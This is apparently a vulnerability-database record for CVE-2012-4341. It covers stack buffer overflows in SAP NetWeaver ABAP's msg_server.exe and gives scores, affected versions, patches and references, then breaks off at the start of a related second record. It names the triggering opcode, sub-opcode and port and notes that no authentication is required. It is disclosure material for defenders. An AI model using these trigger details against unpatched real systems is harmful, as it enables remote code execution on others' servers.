Vulnerability from variot - Updated: 2024-07-23 22:37Multiple stack-based buffer overflows in msg_server.exe in SAP NetWeaver ABAP 7.x allow remote attackers to cause a denial of service (crash) and execute arbitrary code via a (1) long parameter value, (2) crafted string size field, or (3) long Parameter Name string in a package with opcode 0x43 and sub opcode 0x4 to TCP port 3900. This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of SAP Netweaver ABAP. Authentication is not required to exploit this vulnerability. The specific flaw exists within the msg_server.exe listening on 3900 by default. When the msg_server parses a message with opcode 0x43 and sub-opcode 0x04 it uses a user suplied size field to copy a string into a static sized stack buffer. The resulting buffer overflow can lead to remote code execution under the context of the process. Authentication is not required to exploit this vulnerability.The specific flaw exists within the way SAP NetWeaver handles packages with opcode 0x43. SAP NetWeaver has a defect in the message with the opcode 0x43. SAP NetWeaver is the technical foundation for SAP Business Suite solutions, SAP xApps composite applications, partner solutions, and custom applications. Msg_server.exe listens to port 3900 by default. Arbitrary code. NetWeaver ABAP is prone to a denial-of-service vulnerability
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201208-0222",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "netweaver",
"scope": null,
"trust": 2.1,
"vendor": "sap",
"version": null
},
{
"model": "netweaver abap",
"scope": "eq",
"trust": 1.6,
"vendor": "sap",
"version": "7.02"
},
{
"model": "netweaver abap",
"scope": "eq",
"trust": 1.6,
"vendor": "sap",
"version": "7.0"
},
{
"model": "netweaver abap",
"scope": "eq",
"trust": 1.6,
"vendor": "sap",
"version": "7.03"
},
{
"model": "netweaver abap",
"scope": null,
"trust": 1.2,
"vendor": "sap",
"version": null
},
{
"model": "netweaver abap",
"scope": "eq",
"trust": 0.8,
"vendor": "sap",
"version": "7.x"
},
{
"model": "netweaver abap null",
"scope": "eq",
"trust": 0.4,
"vendor": "sap",
"version": "*"
},
{
"model": "netweaver abap sp4",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "7.03"
},
{
"model": "netweaver abap sp6",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "7.02"
},
{
"model": "netweaver abap sp2",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "7.0"
}
],
"sources": [
{
"db": "IVD",
"id": "29348194-1f62-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "29fdb3de-1f62-11e6-abef-000c29c66e3d"
},
{
"db": "ZDI",
"id": "ZDI-12-112"
},
{
"db": "ZDI",
"id": "ZDI-12-111"
},
{
"db": "ZDI",
"id": "ZDI-12-104"
},
{
"db": "CNVD",
"id": "CNVD-2012-3434"
},
{
"db": "CNVD",
"id": "CNVD-2012-3433"
},
{
"db": "BID",
"id": "78143"
},
{
"db": "JVNDB",
"id": "JVNDB-2012-003710"
},
{
"db": "CNNVD",
"id": "CNNVD-201208-264"
},
{
"db": "NVD",
"id": "CVE-2012-4341"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver_abap:7.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver_abap:7.02:sp6:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver_abap:7.03:sp4:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2012-4341"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "e6af8de8b1d4b2b6d5ba2610cbf9cd38",
"sources": [
{
"db": "ZDI",
"id": "ZDI-12-112"
},
{
"db": "ZDI",
"id": "ZDI-12-111"
},
{
"db": "ZDI",
"id": "ZDI-12-104"
},
{
"db": "CNNVD",
"id": "CNNVD-201206-539"
}
],
"trust": 2.7
},
"cve": "CVE-2012-4341",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "HIGH",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Complete",
"baseScore": 10.0,
"confidentialityImpact": "Complete",
"exploitabilityScore": null,
"id": "CVE-2012-4341",
"impactScore": null,
"integrityImpact": "Complete",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "High",
"trust": 0.9,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "ZDI",
"availabilityImpact": "COMPLETE",
"baseScore": 9.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "ZDI-12-112",
"impactScore": 8.5,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "HIGH",
"trust": 0.7,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:C",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "ZDI",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"id": "ZDI-12-111",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "HIGH",
"trust": 0.7,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "ZDI",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"id": "ZDI-12-104",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "HIGH",
"trust": 0.7,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": null,
"accessVector": null,
"authentication": null,
"author": "IVD",
"availabilityImpact": null,
"baseScore": null,
"confidentialityImpact": null,
"exploitabilityScore": null,
"id": "29348194-1f62-11e6-abef-000c29c66e3d",
"impactScore": null,
"integrityImpact": null,
"severity": null,
"trust": 0.2,
"vectorString": null,
"version": "unknown"
},
{
"accessComplexity": null,
"accessVector": null,
"authentication": null,
"author": "IVD",
"availabilityImpact": null,
"baseScore": null,
"confidentialityImpact": null,
"exploitabilityScore": null,
"id": "29fdb3de-1f62-11e6-abef-000c29c66e3d",
"impactScore": null,
"integrityImpact": null,
"severity": null,
"trust": 0.2,
"vectorString": null,
"version": "unknown"
}
],
"cvssV3": [],
"severity": [
{
"author": "NVD",
"id": "CVE-2012-4341",
"trust": 1.8,
"value": "HIGH"
},
{
"author": "ZDI",
"id": "ZDI-12-112",
"trust": 0.7,
"value": "HIGH"
},
{
"author": "ZDI",
"id": "ZDI-12-111",
"trust": 0.7,
"value": "HIGH"
},
{
"author": "ZDI",
"id": "ZDI-12-104",
"trust": 0.7,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-201208-264",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "IVD",
"id": "29348194-1f62-11e6-abef-000c29c66e3d",
"trust": 0.2,
"value": "HIGH"
},
{
"author": "IVD",
"id": "29fdb3de-1f62-11e6-abef-000c29c66e3d",
"trust": 0.2,
"value": "HIGH"
},
{
"author": "VULMON",
"id": "CVE-2012-4341",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "IVD",
"id": "29348194-1f62-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "29fdb3de-1f62-11e6-abef-000c29c66e3d"
},
{
"db": "ZDI",
"id": "ZDI-12-112"
},
{
"db": "ZDI",
"id": "ZDI-12-111"
},
{
"db": "ZDI",
"id": "ZDI-12-104"
},
{
"db": "VULMON",
"id": "CVE-2012-4341"
},
{
"db": "JVNDB",
"id": "JVNDB-2012-003710"
},
{
"db": "CNNVD",
"id": "CNNVD-201208-264"
},
{
"db": "NVD",
"id": "CVE-2012-4341"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Multiple stack-based buffer overflows in msg_server.exe in SAP NetWeaver ABAP 7.x allow remote attackers to cause a denial of service (crash) and execute arbitrary code via a (1) long parameter value, (2) crafted string size field, or (3) long Parameter Name string in a package with opcode 0x43 and sub opcode 0x4 to TCP port 3900. This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of SAP Netweaver ABAP. Authentication is not required to exploit this vulnerability. The specific flaw exists within the msg_server.exe listening on 3900 by default. When the msg_server parses a message with opcode 0x43 and sub-opcode 0x04 it uses a user suplied size field to copy a string into a static sized stack buffer. The resulting buffer overflow can lead to remote code execution under the context of the process. Authentication is not required to exploit this vulnerability.The specific flaw exists within the way SAP NetWeaver handles packages with opcode 0x43. SAP NetWeaver has a defect in the message with the opcode 0x43. SAP NetWeaver is the technical foundation for SAP Business Suite solutions, SAP xApps composite applications, partner solutions, and custom applications. Msg_server.exe listens to port 3900 by default. Arbitrary code. NetWeaver ABAP is prone to a denial-of-service vulnerability",
"sources": [
{
"db": "NVD",
"id": "CVE-2012-4341"
},
{
"db": "JVNDB",
"id": "JVNDB-2012-003710"
},
{
"db": "ZDI",
"id": "ZDI-12-112"
},
{
"db": "ZDI",
"id": "ZDI-12-111"
},
{
"db": "ZDI",
"id": "ZDI-12-104"
},
{
"db": "CNVD",
"id": "CNVD-2012-3434"
},
{
"db": "CNVD",
"id": "CNVD-2012-3433"
},
{
"db": "BID",
"id": "78143"
},
{
"db": "IVD",
"id": "29348194-1f62-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "29fdb3de-1f62-11e6-abef-000c29c66e3d"
},
{
"db": "VULMON",
"id": "CVE-2012-4341"
}
],
"trust": 5.31
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2012-4341",
"trust": 2.8
},
{
"db": "ZDI",
"id": "ZDI-12-112",
"trust": 2.7
},
{
"db": "ZDI",
"id": "ZDI-12-111",
"trust": 2.7
},
{
"db": "ZDI",
"id": "ZDI-12-104",
"trust": 2.7
},
{
"db": "SECTRACK",
"id": "1027211",
"trust": 2.0
},
{
"db": "SECUNIA",
"id": "49744",
"trust": 1.7
},
{
"db": "BID",
"id": "54229",
"trust": 1.2
},
{
"db": "CNVD",
"id": "CNVD-2012-3434",
"trust": 0.8
},
{
"db": "CNVD",
"id": "CNVD-2012-3433",
"trust": 0.8
},
{
"db": "JVNDB",
"id": "JVNDB-2012-003710",
"trust": 0.8
},
{
"db": "ZDI_CAN",
"id": "ZDI-CAN-1396",
"trust": 0.7
},
{
"db": "ZDI_CAN",
"id": "ZDI-CAN-1394",
"trust": 0.7
},
{
"db": "ZDI_CAN",
"id": "ZDI-CAN-1395",
"trust": 0.7
},
{
"db": "BID",
"id": "54231",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-201208-264",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-201206-539",
"trust": 0.6
},
{
"db": "BID",
"id": "78143",
"trust": 0.4
},
{
"db": "IVD",
"id": "29348194-1F62-11E6-ABEF-000C29C66E3D",
"trust": 0.2
},
{
"db": "IVD",
"id": "29FDB3DE-1F62-11E6-ABEF-000C29C66E3D",
"trust": 0.2
},
{
"db": "VULMON",
"id": "CVE-2012-4341",
"trust": 0.1
}
],
"sources": [
{
"db": "IVD",
"id": "29348194-1f62-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "29fdb3de-1f62-11e6-abef-000c29c66e3d"
},
{
"db": "ZDI",
"id": "ZDI-12-112"
},
{
"db": "ZDI",
"id": "ZDI-12-111"
},
{
"db": "ZDI",
"id": "ZDI-12-104"
},
{
"db": "CNVD",
"id": "CNVD-2012-3434"
},
{
"db": "CNVD",
"id": "CNVD-2012-3433"
},
{
"db": "VULMON",
"id": "CVE-2012-4341"
},
{
"db": "BID",
"id": "78143"
},
{
"db": "JVNDB",
"id": "JVNDB-2012-003710"
},
{
"db": "CNNVD",
"id": "CNNVD-201208-264"
},
{
"db": "CNNVD",
"id": "CNNVD-201206-539"
},
{
"db": "NVD",
"id": "CVE-2012-4341"
}
]
},
"id": "VAR-201208-0222",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "IVD",
"id": "29348194-1f62-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "29fdb3de-1f62-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2012-3434"
},
{
"db": "CNVD",
"id": "CNVD-2012-3433"
}
],
"trust": 1.87111164
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"ICS"
],
"sub_category": null,
"trust": 1.6
}
],
"sources": [
{
"db": "IVD",
"id": "29348194-1f62-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "29fdb3de-1f62-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2012-3434"
},
{
"db": "CNVD",
"id": "CNVD-2012-3433"
}
]
},
"last_update_date": "2024-07-23T22:37:43.393000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "SAP has issued an update to correct this vulnerability.",
"trust": 1.4,
"url": "https://websmp230.sap-ag.de/sap(bd1lbizjptawmq==)/bc/bsp/spn/sapnotes/index2.htm?numm=1649840"
},
{
"title": "Acknowledgments to Security Researchers",
"trust": 0.8,
"url": "http://scn.sap.com/docs/doc-8218"
},
{
"title": "SAP NetWeaver",
"trust": 0.8,
"url": "http://www.sap.com/platform/netweaver/businessbenefits/customdevelopment.epx"
},
{
"title": "SAP has issued an update to correct this vulnerability.",
"trust": 0.7,
"url": "https://websmp230.sap-ag.de/sap(bd1lbizjptawmq==)/bc/bsp/spn/sapnotes/index2.htm?numm=1649838"
},
{
"title": "SAP Netweaver ABAP \u0027msg_server.exe\u0027 parameter name patch for remote code execution vulnerability",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/18435"
},
{
"title": "SAP Netweaver ABAP \u0027msg_server.exe\u0027 patch for buffer overflow vulnerability",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/18434"
},
{
"title": "SAP NetWeaver ABAP Fixes for multiple stack-based buffer errors",
"trust": 0.6,
"url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=209631"
},
{
"title": "",
"trust": 0.1,
"url": "https://github.com/live-hack-cve/cve-2012-4341 "
},
{
"title": "cve-search",
"trust": 0.1,
"url": "https://github.com/r3p3r/cve-search "
},
{
"title": "cve-search-src",
"trust": 0.1,
"url": "https://github.com/extremenetworks/cve-search-src "
},
{
"title": "",
"trust": 0.1,
"url": "https://github.com/zien-tf/z_iot_cve-search-api "
},
{
"title": "",
"trust": 0.1,
"url": "https://github.com/pgurudatta/cve-search "
},
{
"title": "cve-search",
"trust": 0.1,
"url": "https://github.com/cve-search/cve-search "
},
{
"title": "cve-search",
"trust": 0.1,
"url": "https://github.com/dim0niu/cve-search "
},
{
"title": "cve-search",
"trust": 0.1,
"url": "https://github.com/swastik99/cve-search-master "
},
{
"title": "cve",
"trust": 0.1,
"url": "https://github.com/zwei2008/cve "
},
{
"title": "cve-search",
"trust": 0.1,
"url": "https://github.com/miradam/cve-search "
},
{
"title": "modified_cve-search",
"trust": 0.1,
"url": "https://github.com/hr-cert/modified_cve-search "
},
{
"title": "cve-search",
"trust": 0.1,
"url": "https://github.com/swastik99/cve-search "
},
{
"title": "cve-search-ng",
"trust": 0.1,
"url": "https://github.com/cve-search/cve-search-ng "
}
],
"sources": [
{
"db": "ZDI",
"id": "ZDI-12-112"
},
{
"db": "ZDI",
"id": "ZDI-12-111"
},
{
"db": "ZDI",
"id": "ZDI-12-104"
},
{
"db": "CNVD",
"id": "CNVD-2012-3434"
},
{
"db": "CNVD",
"id": "CNVD-2012-3433"
},
{
"db": "VULMON",
"id": "CVE-2012-4341"
},
{
"db": "JVNDB",
"id": "JVNDB-2012-003710"
},
{
"db": "CNNVD",
"id": "CNNVD-201208-264"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-119",
"trust": 1.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2012-003710"
},
{
"db": "NVD",
"id": "CVE-2012-4341"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.1,
"url": "https://websmp230.sap-ag.de/sap(bd1lbizjptawmq==)/bc/bsp/spn/sapnotes/index2.htm?numm=1649840"
},
{
"trust": 2.0,
"url": "http://www.zerodayinitiative.com/advisories/zdi-12-111/"
},
{
"trust": 2.0,
"url": "https://service.sap.com/sap/support/notes/1649838"
},
{
"trust": 2.0,
"url": "http://www.securitytracker.com/id?1027211"
},
{
"trust": 2.0,
"url": "http://scn.sap.com/docs/doc-8218"
},
{
"trust": 2.0,
"url": "http://www.zerodayinitiative.com/advisories/zdi-12-104/"
},
{
"trust": 2.0,
"url": "http://www.zerodayinitiative.com/advisories/zdi-12-112/"
},
{
"trust": 1.7,
"url": "http://secunia.com/advisories/49744"
},
{
"trust": 1.3,
"url": "https://websmp230.sap-ag.de/sap%28bd1lbizjptawmq==%29/bc/bsp/spn/sapnotes/index2.htm?numm=1649840"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2012-4341"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2012-4341"
},
{
"trust": 0.7,
"url": "https://websmp230.sap-ag.de/sap(bd1lbizjptawmq==)/bc/bsp/spn/sapnotes/index2.htm?numm=1649838"
},
{
"trust": 0.6,
"url": "http://seclists.org/bugtraq/2012/jun/186"
},
{
"trust": 0.6,
"url": "http://seclists.org/bugtraq/2012/jun/185"
},
{
"trust": 0.6,
"url": "http://www.securityfocus.com/bid/54229"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/119.html"
},
{
"trust": 0.1,
"url": "https://github.com/live-hack-cve/cve-2012-4341"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
},
{
"trust": 0.1,
"url": "https://www.securityfocus.com/bid/78143"
},
{
"trust": 0.1,
"url": "https://github.com/cve-search/cve-search"
}
],
"sources": [
{
"db": "ZDI",
"id": "ZDI-12-112"
},
{
"db": "ZDI",
"id": "ZDI-12-111"
},
{
"db": "ZDI",
"id": "ZDI-12-104"
},
{
"db": "CNVD",
"id": "CNVD-2012-3434"
},
{
"db": "CNVD",
"id": "CNVD-2012-3433"
},
{
"db": "VULMON",
"id": "CVE-2012-4341"
},
{
"db": "BID",
"id": "78143"
},
{
"db": "JVNDB",
"id": "JVNDB-2012-003710"
},
{
"db": "CNNVD",
"id": "CNNVD-201208-264"
},
{
"db": "CNNVD",
"id": "CNNVD-201206-539"
},
{
"db": "NVD",
"id": "CVE-2012-4341"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "IVD",
"id": "29348194-1f62-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "29fdb3de-1f62-11e6-abef-000c29c66e3d"
},
{
"db": "ZDI",
"id": "ZDI-12-112"
},
{
"db": "ZDI",
"id": "ZDI-12-111"
},
{
"db": "ZDI",
"id": "ZDI-12-104"
},
{
"db": "CNVD",
"id": "CNVD-2012-3434"
},
{
"db": "CNVD",
"id": "CNVD-2012-3433"
},
{
"db": "VULMON",
"id": "CVE-2012-4341"
},
{
"db": "BID",
"id": "78143"
},
{
"db": "JVNDB",
"id": "JVNDB-2012-003710"
},
{
"db": "CNNVD",
"id": "CNNVD-201208-264"
},
{
"db": "CNNVD",
"id": "CNNVD-201206-539"
},
{
"db": "NVD",
"id": "CVE-2012-4341"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2012-07-02T00:00:00",
"db": "IVD",
"id": "29348194-1f62-11e6-abef-000c29c66e3d"
},
{
"date": "2012-07-02T00:00:00",
"db": "IVD",
"id": "29fdb3de-1f62-11e6-abef-000c29c66e3d"
},
{
"date": "2012-06-28T00:00:00",
"db": "ZDI",
"id": "ZDI-12-112"
},
{
"date": "2012-06-28T00:00:00",
"db": "ZDI",
"id": "ZDI-12-111"
},
{
"date": "2012-06-27T00:00:00",
"db": "ZDI",
"id": "ZDI-12-104"
},
{
"date": "2012-07-02T00:00:00",
"db": "CNVD",
"id": "CNVD-2012-3434"
},
{
"date": "2012-07-02T00:00:00",
"db": "CNVD",
"id": "CNVD-2012-3433"
},
{
"date": "2012-08-15T00:00:00",
"db": "VULMON",
"id": "CVE-2012-4341"
},
{
"date": "2012-08-15T00:00:00",
"db": "BID",
"id": "78143"
},
{
"date": "2012-08-20T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2012-003710"
},
{
"date": "2012-08-16T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201208-264"
},
{
"date": "2012-06-28T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201206-539"
},
{
"date": "2012-08-15T21:55:05.353000",
"db": "NVD",
"id": "CVE-2012-4341"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2012-06-28T00:00:00",
"db": "ZDI",
"id": "ZDI-12-112"
},
{
"date": "2012-06-28T00:00:00",
"db": "ZDI",
"id": "ZDI-12-111"
},
{
"date": "2012-06-27T00:00:00",
"db": "ZDI",
"id": "ZDI-12-104"
},
{
"date": "2012-07-02T00:00:00",
"db": "CNVD",
"id": "CNVD-2012-3434"
},
{
"date": "2012-07-02T00:00:00",
"db": "CNVD",
"id": "CNVD-2012-3433"
},
{
"date": "2022-10-06T00:00:00",
"db": "VULMON",
"id": "CVE-2012-4341"
},
{
"date": "2012-08-15T00:00:00",
"db": "BID",
"id": "78143"
},
{
"date": "2012-08-20T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2012-003710"
},
{
"date": "2022-10-08T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201208-264"
},
{
"date": "2012-07-02T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201206-539"
},
{
"date": "2023-11-07T02:11:50.587000",
"db": "NVD",
"id": "CVE-2012-4341"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201208-264"
},
{
"db": "CNNVD",
"id": "CNNVD-201206-539"
}
],
"trust": 1.2
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP Netweaver ABAP \u0027msg_server.exe\u0027 Parameter name remote code execution vulnerability",
"sources": [
{
"db": "IVD",
"id": "29348194-1f62-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2012-3434"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "buffer error",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201208-264"
}
],
"trust": 0.6
}
}
VAR-202001-0832
Vulnerability from variot - Updated: 2024-07-23 22:37A Buffer Overflow vulnerability exists in the Message Server service _MsJ2EE_AddStatistics() function when sending specially crafted SAP Message Server packets to remote TCP ports 36NN and/or 39NN in SAP NetWeaver 2004s, 7.01 SR1, 7.02 SP06, and 7.30 SP04, which could let a remote malicious user execute arbitrary code. SAP NetWeaver Contains a classic buffer overflow vulnerability.Information is acquired, information is falsified, and denial of service (DoS) May be in a state. Authentication is not required to exploit this vulnerability. The specific flaw exists within the msg_server.exe listening on 3900 by default. When the msg_server parses a message with opcode 0x43 and sub-opcode 0x04 it uses a user suplied size field to copy a string into a static sized stack buffer. The resulting buffer overflow can lead to remote code execution under the context of the process. Authentication is not required to exploit this vulnerability.The specific flaw exists within the way SAP NetWeaver handles packages with opcode 0x43. If a package with sub opcode 0x4 contains a long parameter value string NetWeaver will eventually write a \x00 byte onto the stack to mark the end of the string. SAP NetWeaver has a defect in the message with the opcode 0x43. SAP NetWeaver is the technical foundation for SAP Business Suite solutions, SAP xApps composite applications, partner solutions, and custom applications. Msg_server.exe listens to port 3900 by default. Arbitrary code. Successfully exploiting these issues may allow an attacker to execute arbitrary code with the privileges of the user running the affected application or cause denial-of-service conditions. The following products are affected: SAP Netweaver 2004s SAP Netweaver 